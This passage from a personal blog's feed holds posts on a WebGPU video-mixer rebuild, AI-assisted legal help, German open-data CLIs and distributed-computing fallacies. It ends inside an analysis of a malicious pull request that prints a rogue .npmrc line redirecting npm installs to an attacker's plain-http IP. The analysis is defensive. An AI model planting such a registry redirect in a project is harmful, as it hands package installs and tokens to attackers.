<h2 id="cucumber-of-all-things">Cucumber, of all things</h2>

<p>The behavioral spine of the project is 536 Gherkin scenarios (3,921 steps) in 26 <code class="language-plaintext highlighter-rouge">.feature</code> files, one per hardware block, each scenario ground-truthed against a section of the manual. Alongside them run 208 conventional unit tests. All of it executes headlessly against the real domain code — no GPU, no DOM, no browser.</p>

<p>I am aware that Cucumber has a reputation, mostly earned, as a ceremony generator for enterprise projects where nobody reads the features. Here it did honest work, for one reason: the source material was already written in Gherkin’s register. The manual says things like “When the SELECT button is pressed, the color indicated on the Matte Color Indicator changes from lower to upper. The Black will be selected after the Color Bar.” That is a scenario. You transcribe it, wire the steps to the reducer, and now a forty-page document from 1992 fails your build when you get the matte cycling order wrong. When behavior and code disagree, the feature file wins until a scenario is deliberately changed — a policy that sounds bureaucratic and in practice meant the manual kept catching me.</p>

<p><img src="/assets/posts/resurrecting-the-panasonic-wj-mx50-in-webgpu/hupg16fx62ndil5li2vk.webp" alt="web-mx-50 program monitor, on air, showing a luminance-keyed title over a colored triangular grid pattern" /></p>

<p>The wipe engine benefited most from this. The MX50’s 287 wipe patterns are not a list; they are a small algebra. Seven pattern families, each cycling four variants, times a set of stackable modifiers (Compression, Slide, Multi, Pairing, Blinds), with a legality table for which combinations exist and a numbering scheme where pattern <em>n</em> and pattern <em>n</em>+128 are the same wipe reversed. Numbers above 255 exist on the panel but cannot be addressed over RS-422, and the external edit controller could only call 01–99, with 99 meaning “whatever is currently set up” — an escape hatch I have come to admire. All of that is pure arithmetic and table lookups, implemented in one GPU-free module and specified exhaustively in Gherkin. The shader consumes its output; it does not reimplement it.</p>

<h2 id="the-gpu-part">The GPU part</h2>

<p>The wipe shader treats each family as an analytic signed distance field <code class="language-plaintext highlighter-rouge">f(uv, progress, variant)</code>. The A/B mask is <code class="language-plaintext highlighter-rouge">smoothstep(-w, +w, f)</code>; the Soft button sets the feather width <code class="language-plaintext highlighter-rouge">w</code>; the Border button draws a colored band where <code class="language-plaintext highlighter-rouge">|f|</code> is small, with the color computed CPU-side as the complement of the current matte color, exactly as the manual specifies. Reverse mirrors a coordinate, Aspect scales one axis for the square family, Multi tiles the coordinate space, Pairing mirrors it before evaluation. One shader, one uniform block, seven fields.</p>

<p>Two decisions here deserve a note because they are where fidelity was deliberately bent.</p>

<p>The first: no NTSC. The real unit sampled 8-bit component video at 4:1:1 and juggled interlaced fields; its Frame button traded vertical resolution against interlace flicker. Browser sources arrive as progressive full-resolution RGBA frames on a compositor clock. Emulating chroma subsampling, field parity, and genlock drift would mean synthesizing artifacts the input never had — fiction, not emulation. So the working representation is linear-light RGBA with sRGB output, the compositing math is done in linear space (do this, or your wipe edges gamma-darken), and the Frame button’s behavior is documented as moot. The substrate was deferred; the behavior was not.</p>

<p>The second: the frame synchronizer, the MX50’s headline feature in 1992, is not built, because the problem it solved no longer exists. What survives from that silicon is its side effect — per-bus frame memory — which is what Still, Strobe, Multi, and Trail actually consume. Those four effects share one GPU frame-store per bus, and because they share it, the hardware’s odd exclusion rules (Still and Strobe are mutually exclusive; Trail rides on Still) fall out of the design rather than being bolted on. It is pleasant when the original engineers’ constraints explain your own.</p>

<h2 id="timing-or-why-300-frames-is-300-frames">Timing, or why 300 frames is 300 frames</h2>

<p>Auto Take and Auto Fade run 0–510 frames in 2-frame steps, pausable mid-flight. In a club this is not a convenience feature; it is how you land a transition on a phrase boundary — dial the frame count once, then fire it on the one. A transition whose duration wobbles with the display refresh rate would be useless for that. And if you drive it from <code class="language-plaintext highlighter-rouge">requestAnimationFrame</code> deltas, that is what you get: a 300-frame fade takes a different wall time on a 60 Hz and a 144 Hz monitor, and your tests need a browser besides. Instead there is a fixed-timestep logical clock: an accumulator converts real elapsed time into whole video-frame ticks, all time-dependent logic reads ticks only, and the present loop uses the sub-tick fraction purely for interpolation. Tests step the clock directly. A 300-frame fade is 300 ticks everywhere, which is the kind of sentence you want to be able to write about a mixer.</p>

<h2 id="what-i-would-tell-you-if-you-tried-this">What I would tell you if you tried this</h2>

<p><img src="/assets/posts/resurrecting-the-panasonic-wj-mx50-in-webgpu/n1w7k3oybbj3z6z0g327.webp" alt="web-mx-50 browser operator surface with four source feeds, program monitor, wipe pattern grid and lever" /></p>

<p>Pick an artifact with a good manual. The MX50 succeeded here because Panasonic’s technical writers in 1992 specified blinking LEDs and frame counts; a vaguer manual would have left me inventing behavior and calling it fidelity. Transcribe first, code second — the feature files were worth more than any framework. Keep the state in one dumb value; every hardware feature that looked hard (event memory, persistence, external control) became easy for that one reason. And decide early, in writing, which parts of the past you are not bringing along. There are sixteen architecture decision records in the repository, and the two most useful ones are the ones that say “no.”</p>

<p>The domain model is complete and verified. The deferred remainder — mostly rendered-pixel verification and browser-only surfaces — is inventoried with a file and line number for each item, which is as close as a proof of concept gets to a clean desk.</p>

<p>The code is at <a href="https://github.com/sebs/webgpu-mx-50">github.com/sebs/webgpu-mx-50</a> The manual, as ever, is the authority — though the manual never once anticipated a smoke machine.</p>

<h2 id="status-and-what-comes-next">Status and what comes next</h2>

<ul>
  <li>The prototype source is published.</li>
  <li>Next: a web component, so the mixer can be dropped into any website.</li>
  <li>A demo setup with Source A/B, preview, and program-out channels.</li>
  <li>A UI reproducing the original panel layout.</li>
  <li>Multi-tab and multi-window operation.</li>
  <li>Further exploration of the mixer in a website context as a tool for visual art.</li>
</ul>]]></content><author><name>Sebastian Schürmann</name></author><category term="game-development" /><category term="web-development" /><category term="testing-and-quality" /><summary type="html"><![CDATA[Rebuilding the 1990s Panasonic WJ-MX50 video mixer in TypeScript and WebGPU, with one reducer, 536 Gherkin scenarios from the manual and SDF wipes.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://sebs.github.io/assets/posts/resurrecting-the-panasonic-wj-mx50-in-webgpu/og.jpg" /><media:content medium="image" url="https://sebs.github.io/assets/posts/resurrecting-the-panasonic-wj-mx50-in-webgpu/og.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Claude Lawfare</title><link href="https://sebs.github.io/2026/07/24/claude-lawfare/" rel="alternate" type="text/html" title="Claude Lawfare" /><published>2026-07-24T17:45:39+00:00</published><updated>2026-07-24T17:45:39+00:00</updated><id>https://sebs.github.io/2026/07/24/claude-lawfare</id><content type="html" xml:base="https://sebs.github.io/2026/07/24/claude-lawfare/"><![CDATA[<p>CN: Death</p>

<h2 id="i-the-letter">I. The letter</h2>

<p>My father died in November. Sometime between the 16th and the 19th — the death certificate gives a range, not a date, which is its own small horror to read on a form.</p>

<p>Months later, after the apartment was emptied and cleaned and handed back, after the trip south to collect the certificate of inheritance from the probate court and carry it, personally, to the housing cooperative’s office, two letters arrived. They were dated eighteen days apart. They arrived in the same envelope, on the same day.</p>

<p>The gist: his membership in the cooperative would end. The shares — fourteen of them, a small four-figure sum — would be paid out to me after next year’s members’ meeting. A transfer of the shares themselves was “no longer possible due to the long delay.”</p>

<p>I didn’t want the money. I wanted the shares. In a housing cooperative the shares aren’t an investment, they’re a position: they’re what makes you a member rather than a possible tenant. Converting them to cash is not a settlement, it’s an eviction from a category: I could get a affordable apartment in my hometown and given I work in a org functionality for a company based there. Do your Math.</p>

<p>I also had the strong feeling — the specific, useless feeling you get when an institution tells you something in the passive voice — that this was wrong. Not unfair. <em>Wrong.</em> As in: incorrect. As in: someone in an office had put my file in the wrong pile and the wrong pile had a form letter attached to it.</p>

<p>But feeling that and knowing it are different things, and the gap between them is exactly where most people give up. That gap is made of statutes you’ve never read, a set of bylaws written in 1871 and amended for a century and a half, and the entirely reasonable suspicion that fighting over a four-figure sum will cost you more than the four figures.</p>

<p>So I did the thing that would have been science fiction three years ago. I dumped everything — the bylaws, the letters, the emails, the death certificate, the handover protocol, the whole miserable folder — into a context window and asked a language model to tell me whether I was right.</p>

<p>180 minutes later I had a two-page letter citing four statutes and three bylaw sections, a reference document mapping every legal provision in play, and a clear answer to the question I’d actually been asking, which was not <em>what are my rights</em> but <em>am I crazy.</em></p>

<p>I was not crazy. The cooperative had applied the wrong paragraph.</p>

<hr />

<h2 id="ii-what-actually-happened-technically">II. What actually happened, technically</h2>

<p>The mechanics matter here, because the interesting part isn’t “AI wrote a letter.” Anyone can get an AI to write a letter. The interesting part is the shape of the reasoning, and where the machine was better than I was, and where it was worse.</p>

<p><strong>The documents were garbage and it didn’t matter.</strong> The bylaws were a scanned PDF of a printed booklet — no text layer, and the file wasn’t even really a PDF, it was a zip of page images with a misleading extension. In 2019 this is where the project dies. Instead: unzip, rasterize, OCR with a German language model, and thirty-two pages of 19th-century cooperative law became searchable text. Imperfect text — the OCR rendered § as $ half the time — but searchable. The bad scan is no longer a barrier to entry. That is a bigger deal than it sounds. An enormous amount of the law that governs ordinary people’s lives sits in exactly this format: scanned, unindexed, technically public and practically inaccessible.</p>

<p><strong>The core error was a paragraph mix-up, and finding it required reading two provisions side by side.</strong> The cooperative had reasoned from the section governing <em>transfer of shares between living people</em> — which requires board approval, to which no one has a right. Hence “not possible.” But when a member dies, that section doesn’t apply. A different one does: the one saying membership <em>continues</em> through the heirs. Automatically. By operation of law. No application, no approval, no transfer. The entry in the members’ register merely records what already happened; it doesn’t create it.</p>

<p>That’s the whole case. One paragraph substituted for another. It’s not an exotic legal theory, it’s a filing error with legal consequences, and once you see it you can’t unsee it.</p>

<p><strong>The strongest argument came from a distinction the model made that I hadn’t.</strong> The bylaws <em>do</em> contain a six-month deadline — but the clause begins “if there are several heirs.” I’m an only child of a divorced man; there is no one else. The deadline was never running. And then the move that made it airtight: that clause exists because the statute <em>permits</em> cooperatives to impose such a deadline, and the statute permits it explicitly and only “for the case of inheritance by several heirs.” So even if the cooperative wanted to read its own bylaws expansively, it couldn’t — the law above the bylaws doesn’t allow it. The argument shifted from <em>that’s not what your rules say</em> (arguable) to <em>your rules aren’t allowed to say more</em> (not arguable).</p>

<p>I would not have found that. I know what I know, and the hierarchy between an enabling statute and a bylaw clause is not in it.</p>

<p><strong>The date the cooperative chose gave away its own reasoning.</strong> Termination “due to death” — effective December 31st of the following year. That date can’t be derived from anything except the several-heirs clause: deadline expires, membership ends at the close of that business year. So the office had assumed a community of heirs that failed to meet a deadline. The certificate of inheritance, which they had in their hands, says “sole.” The date was a confession.</p>

<p><strong>And they had already called me the heir in writing.</strong> Buried in an April email, in the middle of a paragraph about renovation costs: “son and heir of the deceased.” They had accepted my inheritance for every obligation — clearing the apartment, the repairs, an outstanding invoice — and denied it for the one right attached to it. There’s a Latin phrase for this and a section of the civil code, but you don’t need either. You need someone to notice the sentence. The model noticed the sentence.</p>

<p><strong>Where it was worse than me, and this matters more than the wins:</strong> at one point a draft stated a fact about my own case more precisely than I could actually back up. Not invented — I had told it so, and it had reasonably taken my word. But a confident, checkable, <em>false-if-challenged</em> factual claim sitting in the middle of an otherwise solid letter is exactly the thing that gets a good case laughed out of a room. The fix was to restate it in a form that was still true if someone pushed. Same argumentative force, no exposure.</p>

<p>The model flagged the risk itself, which is to its credit. But I had to be in the room to know which version of the fact would survive contact with the other side. <strong>The machine can tell you which sentence is dangerous. It cannot tell you which one is true.</strong> That’s the whole division of labor, and everything below follows from it.</p>

<hr />

<h2 id="iii-the-politics-of-having-this-thing">III. The politics of having this thing</h2>

<p>Here’s the part I’ve been circling.</p>

<p>What happened in those 180 minutes was not that I got legal advice. I got something more specific and, I think, more consequential: <strong>I got parity.</strong></p>

<p>The cooperative’s office has a process. The process has been run hundreds of times. It has form letters, an internal sequence, precedent, and — decisively — the knowledge that almost nobody on the receiving end will check. That last asymmetry is the load-bearing one. Institutions are not usually malicious. They are usually <em>routinized</em>, and routine plus asymmetric knowledge produces outcomes indistinguishable from malice while everyone involved keeps a clear conscience.</p>

<p>The traditional fix is a lawyer. The traditional fix costs more than the thing you’re fighting over, which is why the traditional fix mostly doesn’t get used, which is why the routine keeps producing the same outcome. Every small wrong sits below the threshold where the remedy makes economic sense. That’s not a bug in the legal system, that’s the equilibrium the legal system rests on.</p>

<p>A capable model collapses the cost of <em>the first 180 percent</em> of that work to roughly zero. Not the last ten. Not the courtroom, not the strategy under adversarial pressure, not the judgment about which fights are worth having. But the reading, the mapping, the finding of the wrong paragraph, the drafting, the citation-checking — the part that turns a feeling into a claim. That part is now free.</p>

<p>I want to be careful about the triumphalism here, because there are three things about this that worry me.</p>

<p><strong>First: this cuts both ways, and the other way has more money.</strong> If I can produce a well-cited demand letter in 180 minutes, so can a debt collector, a patent troll, a landlord’s management company, a firm that sends ten thousand letters a month hoping two percent pay. The cost of <em>generating</em> legal pressure has fallen for everyone, and the people who were already generating legal pressure at industrial scale have better tooling and no scruples about volume. A world where everyone can produce a plausible legal threat instantly is not obviously a world with more justice in it. It may just be a world with more letters.</p>

<p>The asymmetry doesn’t vanish. It moves. What used to be an asymmetry of <em>access to expertise</em> becomes an asymmetry of <em>capacity to absorb noise</em>. Institutions can absorb noise. Individuals can’t.</p>

<p><strong>Second: fluency is not correctness, and this failure mode is nastier than the old one.</strong> The false date almost went out. It was in a paragraph that read beautifully. A wrong claim wrapped in correct citations and confident structure is more dangerous than obvious nonsense, because obvious nonsense gets caught. There is a specific new hazard — a person with no legal training, holding a document that <em>looks</em> exactly like competent legal work, with no ability to tell which sentences are load-bearing and which are fabricated. They will send it. Some of them will send it into situations far more consequential than a dispute over cooperative shares.</p>

<p>The thing that made this work was not the model’s competence. It was that I could check the facts it asserted, because the facts were about my own life. Every single time I caught something, it was a fact about <em>me</em> — what had actually happened, and how much of it I could prove. That’s the domain where a layperson retains real epistemic authority. Push into a domain where the user can’t check anything and the same fluency becomes a liability with a nice typeface.</p>

<p><strong>Third, and this is the one that actually keeps me up: this capability is contingent, and it is nobody’s right.</strong> I used a frontier model, on a good day, with a large context window, with tools that let it run OCR and search the web and render documents. None of that is guaranteed to exist next year in the form it exists today, at a price I can pay, for the uses I want to put it to.</p>

<p>Access can be tiered. Capability can be routed — a query about something sensitive can quietly get answered by a smaller model, and you may not be told. Terms of service can carve out legal use entirely, and there are real liability reasons a provider might want them to. Regulation could mandate that carve-out in the name of consumer protection, which would protect consumers from bad legal advice by protecting them from any legal advice at all, in the way that a locked hospital protects you from infection.</p>

<p>And the people who’d be least affected by all of that are the ones who already have lawyers.</p>

<p>The most darkly funny version of this: the institutions on the other side of these disputes will absolutely have the enterprise tier. Legal-tech procurement is a line item. A large housing company, an insurer, a collections agency — they will have the good model, integrated, with a compliance wrapper and an indemnity clause. The question is whether the person on the receiving end of the form letter has anything at all.</p>

<p>That, and not model capability, is the political question. The technology to close the gap exists. It worked. I have the letter, cited and dated and in the mail. The open question is whether that stays true for people with less time, less education, less money, and a worse case than mine — or whether this turns out to have been a brief window in which the tools were unusually good and unusually available, before the pricing and the liability lawyers and the regulators sorted everyone back into the categories they came from.</p>

<hr />

<p>I don’t know how the dispute ends. The deadline I set falls in the middle of August. If nothing happens I have two more letters ready — one to the supervisory board, one to the auditing association that reviews the cooperative’s administration, including, as it happens, the correct maintenance of the members’ register.</p>

<p>Both were drafted in about twenty minutes.</p>

<p>That’s the part I can’t stop thinking about. Not that a machine helped me win an argument. That a fight I would have lost by default — not on the merits, by <em>default</em>, by exhaustion, by the sheer administrative friction of being one person against a process — became a fight I could actually have.</p>

<p>For now.</p>]]></content><author><name>Sebastian Schürmann</name></author><category term="open-data" /><category term="ai-and-critical-thinking" /><summary type="html"><![CDATA[Using Claude to contest a housing cooperative's refusal to transfer inherited shares, and what cheap AI legal help means for parity, risk and access.]]></summary></entry><entry><title type="html">sudo ‘schland just give me my data</title><link href="https://sebs.github.io/2026/07/06/sudo-schland-just-give-me-my-data/" rel="alternate" type="text/html" title="sudo ‘schland just give me my data" /><published>2026-07-06T17:31:08+00:00</published><updated>2026-07-06T17:31:08+00:00</updated><id>https://sebs.github.io/2026/07/06/sudo-schland-just-give-me-my-data</id><content type="html" xml:base="https://sebs.github.io/2026/07/06/sudo-schland-just-give-me-my-data/"><![CDATA[<p>There’s an old xkcd. Guy says “make me a sandwich.” Gets refused. Says “sudo make me a sandwich.” Gets a sandwich.</p>

<p>I’ve been running the same play, except the sandwich is public data and the reluctant party is the Federal Republic of Germany. The result is <a href="https://github.com/maschinenlesbar-org">maschinenlesbar.org</a>: Many TypeScript CLIs, one per open API the German state runs, all on npm, all built the same way. <code class="language-plaintext highlighter-rouge">sudo bundesrepublik --json</code>, more or less. 25 is the current count. The plan is roughly a hundred.</p>

<h2 id="the-joke-in-the-name">The joke in the name</h2>

<p>“Maschinenlesbar” means machine-readable, and it’s not a word I made up for branding. It appears <em>in German law</em>. The E-Government-Gesetz obliges federal agencies to publish their data in machine-readable formats. A country that still confirms things by fax has a statute demanding machine-readability.</p>

<p>And on paper, the agencies delivered. Live water levels for every federal waterway. The complete federal budget. Every registered lobbyist. Ambient gamma radiation from about 1,700 probes. Parliamentary proceedings going back decades. All behind REST endpoints, largely unauthenticated.</p>

<p>So far, so good. Now try to <em>connect</em> any of it.</p>

<h2 id="the-moat">The moat</h2>

<p>Here’s the thesis, and it holds across every party and every legislative period: the core strategy of German open-data politics is the prevention of interoperability. The data is published — that box is checked. The data cannot be linked. That’s the actual defense.</p>

<p>Smart people have spent years trying to get one uniform interface over the <em>kleine Anfragen</em> — the written parliamentary questions — across Germany’s parliaments. Or the parliamentary documentation, sixteen states plus the Bundestag, in one format. LOL. There are X systems and every single one does things <em>slightly</em> differently. Federalism is a fine idea for distributing power; here it moonlights as a technique for making sure data never meets other data. Nobody had to forbid anything. No shared identifiers, no common schemas, a different timestamp format per API, one endpoint speaking clean JSON and the next speaking WFS — an OGC standard older than the iPhone — and the job is done.</p>

<p>And when passive fragmentation isn’t enough, there’s the active move: change a format, arbitrarily, and watch every downstream tool die. That trick has quietly killed civic-tech projects for two decades.</p>

<p>Because the dangerous thing was never a single dataset. A lobbyist list is a phone book. A budget is a spreadsheet. It’s the <em>join</em> that produces accountability: this lobbyist, this committee, this budget line, this vote. Publish everything, link nothing, and you get transparency theater — technically open, practically opaque.</p>

<h2 id="25-boring-clis-as-a-political-act">25 boring CLIs as a political act</h2>

<p>Which is why aggressive uniformity is the entire design. Every CLI:</p>

<ul>
  <li>installs the same way (<code class="language-plaintext highlighter-rouge">npm i -g &lt;name&gt;-cli</code>, or just <code class="language-plaintext highlighter-rouge">npx</code> it)</li>
  <li>emits JSON on stdout, errors on stderr, honest exit codes</li>
  <li>ships as a typed API client too, if you’d rather import than shell out</li>
</ul>

<p>Uniformity on the outside is interoperability retrofitted in userland. The state won’t build the joins — fine, <code class="language-plaintext highlighter-rouge">jq</code> and a pipe will.</p>

<blockquote>
  <p>“write programs that handle text streams, because that is a universal interface”</p>
</blockquote>

<p>Doug McIlroy’s quote is fifty years old and turns out to double as civic infrastructure.</p>

<p>There’s also a speed asymmetry worth naming. The state ships one half-baked portal per geological epoch. An open-source tool, once it’s out there, does five to ten iterations in the same window — and how that pace is sustained across a hundred repos is its own story, which I’ll get to at the end. Suffice it for now: I’m genuinely curious whether the old sabotage strategies still work. My bet is no.</p>

<h2 id="anti-journalism-in-the-friendliest-possible-way">Anti-journalism, in the friendliest possible way</h2>

<p>The other honest motivation, and I know how the word sounds: this is anti-journalism activism.</p>

<p>Not anti-truth. Anti-middleman. The project started because I wanted to understand politics better and noticed the way to do it was to stop reading coverage and start reading sources — because something is deeply off in the land of print and online.</p>

<p>If you’ve followed games journalism, you already know the mechanism. Embargo access, preview trips, review copies: cuddle with the subject of your reporting long enough and their viewpoints start seeping into the copy. Whoever wants access has to heel. Berlin political journalism runs the identical loop, just with ministries instead of publishers. Ask genuinely hard questions and you stop getting interview partners; stay harmless and you get the chancellor on your politics podcast — formats that have degraded into free airtime, retransmitting campaign promises without so much as a follow-up question.</p>

<p>The business model completes the picture, and it’s beautifully inverted: the comment section — the part engineered to split people, because division is engagement — is free. The actual reporting sits behind the paywall. Outrage as the loss leader, information as the premium tier. Meanwhile the 90-page committee document that the 400-word article summarizes sits in a public API, timestamped and complete, read by approximately nobody.</p>

<p>Here’s the sentence that will annoy everyone, so let me stand behind it: a language model reproduces mediocrity, at best. That happens to clear the bar for most of German political journalism. If your value-add over the primary source is a summary plus a framing, you are competing with <code class="language-plaintext highlighter-rouge">curl</code> piped into a tin can — and losing on price, speed, and blood pressure.</p>

<p>But replacement is the petty version of the goal. The real one is democratizing access. A normal citizen has neither the money to first train as a political scientist nor the decade for a traineeship just to work out what a law will actually do to them. The documents are public; the <em>literacy</em> was gatekept. An agent with these CLIs closes that gap — and sometimes the entire barrier is language: rewrite a committee report in plain German, or in another language altogether, and a document that was technically public becomes actually accessible. Plenty of people can consume politics straight from the source once someone removes the provocative framing that only ever served somebody else’s revenue. I’m fairly certain I’m not the only one who wants that.</p>

<p>The manual version of this research already works and I’ve done it plenty: pull a member of parliament from the Bundestag’s DIP system, enrich the picture at abgeordnetenwatch.de, then follow the person’s pet topic down a FragDenStaat rabbit hole of freedom-of-information requests. Handwork, but it delivers — that route has genuinely surprised me more than once, and the surprises are the point. I go looking for my unknowns.</p>

<p>Handwork, though? Maybe not for long.</p>

<h2 id="the-new-unix-user-has-no-hands">The new Unix user has no hands</h2>

<p>Agentic systems — the new machine god, as I’ve taken to calling it, with more patience than a trainee news desk and better organization than the people officially in charge of “Digitalisierung” — are terminal natives. Give an agent a tool that takes flags and returns JSON with a predictable schema and it uses it correctly on the first try; it has seen ten million CLIs in training. The shell <em>is</em> the integration layer. Every agent runtime on earth can execute a command; not every one speaks whatever protocol is fashionable this quarter. That’s why it’s CLI first, and why each repo ships agent skills alongside the binary — the CLI is the muscle, the skill is the manual.</p>

<p>Now hand an agent all 25 manuals and describe the DIP → abgeordnetenwatch → FragDenStaat workflow. It runs the whole rabbit hole in minutes, in parallel, with citations. And notice: entity matching across inconsistently named datasets — the state’s main anti-interoperability defense — happens to be something language models are freakishly good at. The moat was designed for humans with browsers. It was not designed for this.</p>

<p>The traffic runs the other way too. These tin cans confabulate; producing plausible text is the whole job description, and a model will invent a river level or a committee vote without blinking. Feeding it primary data from calibrated government systems — a sensor bolted to a bridge, a document with an ID and a timestamp — is how you stop the machine from making things up. The APIs ground the model; the model joins the APIs. Fair trade.</p>

<p>How you combine thetools is, as far as I’m concerned, a secret between you and your computer.</p>

<h2 id="how-does-one-even-end-up-here">How does one even end up here</h2>

<p>In a second repo sits a politics search engine that needs exactly this data for contextualization — a five-digit number of sources, collected since the RSS days. The engine has been through three eras that neatly mirror the last fifteen years of search itself: pure full-text before 2010, semantic search through 2020, and since 2025 both of those with a language model bolted on top. The CLIs are what that stack turned out to need: grounding. Fifteen-plus years of watching this ecosystem is where the interoperability thesis comes from; it’s not a hot take, it’s a scar.</p>

<h2 id="the-boring-parts-on-purpose">The boring parts, on purpose</h2>

<p>Everything is AGPL. Every package ships an SBOM, because I’ve written enough about npm supply-chain attacks to refuse publishing anything opaque myself. Version numbers start at 0.0.x and mean it.</p>

<h2 id="the-dark-factory">The dark factory</h2>

<p>Which leaves the question of how sixteen of these exist already and a hundred are plausible without me giving up sleep, food, or my remaining goodwill. The answer is the part of the project I find most instructive: the CLIs come out of a dark factory.</p>

<p>Manufacturing people know the term — lights-out production. FANUC has run plants in Japan where robots build robots for weeks at a stretch with the lights literally off, because nobody’s in the building to need them. That, minus the sheet metal, is the production model here. There’s a template repository that acts as the assembly line: project layout, flag conventions, test harness, CI, SBOM generation, npm publishing — the jigs and fixtures. A new government API enters at one end as raw material; agents read whatever passes for its documentation, probe the endpoints, generate the wrapper against the template, write the tests, write the agent skill, and a CLI comes out the other end, boxed and labeled like its fifteen siblings. When shared plumbing improves, the change propagates across every repo the same way — nobody hand-edits sixteen READMEs at 11 PM, because nobody hand-edits sixteen READMEs at all.</p>

<p>My job in this factory is not on the line. It’s the job humans keep in every lights-out plant: I define the product, I set the tolerances, and I stand at the quality gate reading diffs before anything ships. Exception handling, in both senses.</p>

<p>Two consequences fall out of this, and they’re the whole game. First, the marginal cost of wrapping one more government API is approaching the cost of caring about it — which is how “roughly a hundred” stops being bravado and becomes a backlog. Second, remember the state’s favorite defense, the arbitrary format change? Against a hand-maintained scraper, lethal. Against a factory, it’s a work order. The breakage lands in CI, an agent retools the line, I review the diff over coffee. The sabotage now costs the saboteur more than the target.</p>

<hr />

<p>*The project lives at <a href="https://github.com/maschinenlesbar-org">github.com/maschinenlesbar-org</a>, with running commentary at <a href="https://bsky.app/profile/maschinenlesbar.bsky.social">@maschinenlesbar.bsky.social</a>. *</p>]]></content><author><name>Sebastian Schürmann</name></author><category term="open-data" /><category term="ai-assisted-development" /><category term="developer-tooling" /><summary type="html"><![CDATA[maschinenlesbar.org wraps German government open data APIs in uniform TypeScript CLIs built by an agent-driven dark factory, so the data can be linked.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://sebs.github.io/assets/posts/sudo-schland-just-give-me-my-data/og.jpg" /><media:content medium="image" url="https://sebs.github.io/assets/posts/sudo-schland-just-give-me-my-data/og.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Fallacies of distributed computing</title><link href="https://sebs.github.io/2026/07/01/fallacies-of-distributed-computing/" rel="alternate" type="text/html" title="Fallacies of distributed computing" /><published>2026-07-01T20:26:30+00:00</published><updated>2026-07-01T20:26:30+00:00</updated><id>https://sebs.github.io/2026/07/01/fallacies-of-distributed-computing</id><content type="html" xml:base="https://sebs.github.io/2026/07/01/fallacies-of-distributed-computing/"><![CDATA[<ul>
  <li>The network is reliable;</li>
  <li>Latency is zero;</li>
  <li>Bandwidth is infinite;</li>
  <li>The network is secure;</li>
  <li>Topology doesn’t change;</li>
  <li>There is one administrator;</li>
  <li>Transport cost is zero;</li>
  <li>The network is homogeneous;</li>
</ul>

<p><a href="https://en.wikipedia.org/wiki/Fallacies_of_distributed_computing">wp</a></p>]]></content><author><name>Sebastian Schürmann</name></author><category term="software-architecture" /><summary type="html"><![CDATA[The eight fallacies of distributed computing, from a reliable network and zero latency to a single administrator and a homogeneous network.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://sebs.github.io/assets/posts/fallacies-of-distributed-computing/og.jpg" /><media:content medium="image" url="https://sebs.github.io/assets/posts/fallacies-of-distributed-computing/og.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">A Rogue Registry in My Own Backyard: Anatomy of a Two-Line Supply Chain Attack</title><link href="https://sebs.github.io/2026/06/27/a-rogue-registry-in-my-own-backyard-anatomy-of-a-two-line-supply-chain-attack/" rel="alternate" type="text/html" title="A Rogue Registry in My Own Backyard: Anatomy of a Two-Line Supply Chain Attack" /><published>2026-06-27T22:30:09+00:00</published><updated>2026-06-27T22:30:09+00:00</updated><id>https://sebs.github.io/2026/06/27/a-rogue-registry-in-my-own-backyard-anatomy-of-a-two-line-supply-chain-attack</id><content type="html" xml:base="https://sebs.github.io/2026/06/27/a-rogue-registry-in-my-own-backyard-anatomy-of-a-two-line-supply-chain-attack/"><![CDATA[<p>The previous parts of this series were written from a comfortable distance. I read the Trend Micro diagrams about Shai-Hulud, I theorised about Docker network egress and rolling keys, and I lectured everyone about phishing training while quietly assuming it would happen to other people’s repositories. The universe, being the comedian it is, decided to file a pull request against <code class="language-plaintext highlighter-rouge">sebs/etherscan-api</code> to correct that assumption.</p>

<p>This one is worth a writeup precisely because it is <em>small</em>. No worm, no self-replicating bash, no 200-line obfuscated payload. Six lines added, three removed, across two files. If you reviewed it at 23:00 with one eye open, you would merge it. That is the whole point of it, and that is why it belongs in this series.</p>

<h2 id="the-bait">The bait</h2>

<p>The PR arrived titled <code class="language-plaintext highlighter-rouge">refactor: replace manual multicall with ethers-multicall-utils</code>. The description is a thing of beauty in the way that all good lies are tidy:</p>

<blockquote>
  <p>This PR integrates <code class="language-plaintext highlighter-rouge">ethers-multicall-utils</code> to improve performance of multi-contract reads.</p>
  <ul>
    <li>Reduces network latency</li>
    <li>Works with all EVM chains</li>
    <li>Zero dependencies</li>
  </ul>
</blockquote>

<p>Read that again. It is fluent in the dialect of the modern PR. It has bullet points. It says “zero dependencies,” which is the magic phrase that makes a security-minded maintainer relax their shoulders — the previous post in this series was literally me preaching about minimal package footprint, and here is a contributor seemingly speaking my language back to me. That is not a coincidence. The social engineering is calibrated for the target.</p>

<p>The author account was not a five-minute-old burner either. Aged profile, hundreds of repos, an Arctic Code Vault badge, Pull Shark, a believable bio, a real-looking employer. Everything about the envelope says “competent open-source human.” Everything in the envelope says otherwise.</p>

<h2 id="the-actual-payload">The actual payload</h2>

<p>Here is the entire attack. First, a brand new <code class="language-plaintext highlighter-rouge">.npmrc</code> appears in the repo root:</p>

<div class="language-ini highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="py">registry</span><span class="p">=</span><span class="s">https://registry.npmjs.org/</span>
<span class="na">:</span><span class="py">registry</span><span class="p">=</span><span class="s">http://206.223.232.170:64389/</span>
</code></pre></div></div>

<p>The first line is decoration. It points at the real npm registry and exists purely so the file looks reasonable to a skimming eye.</p>

<p>The second line is the knife. The empty-scope syntax <code class="language-plaintext highlighter-rouge">:registry=</code> sets the <strong>default</strong> registry for everything that does not carry an explicit scope. So the net effect of those two lines together is: ignore the line above, and resolve packages from <code class="language-plaintext highlighter-rouge">http://206.223.232.170:64389/</code> instead.</p>

<p>Three things should set your hair on fire here:</p>

<ol>
  <li>It is a <strong>bare IP address</strong>, not a registry hostname. Legitimate registries have names. Names have TLS certificates. Names can be revoked. An IP on a high random port is somebody’s box.</li>
  <li>It is <strong>plain <code class="language-plaintext highlighter-rouge">http://</code></strong>. No TLS at all. Whoever controls the wire — or simply controls that host — controls every byte npm pulls down, and any token npm sends up during install.</li>
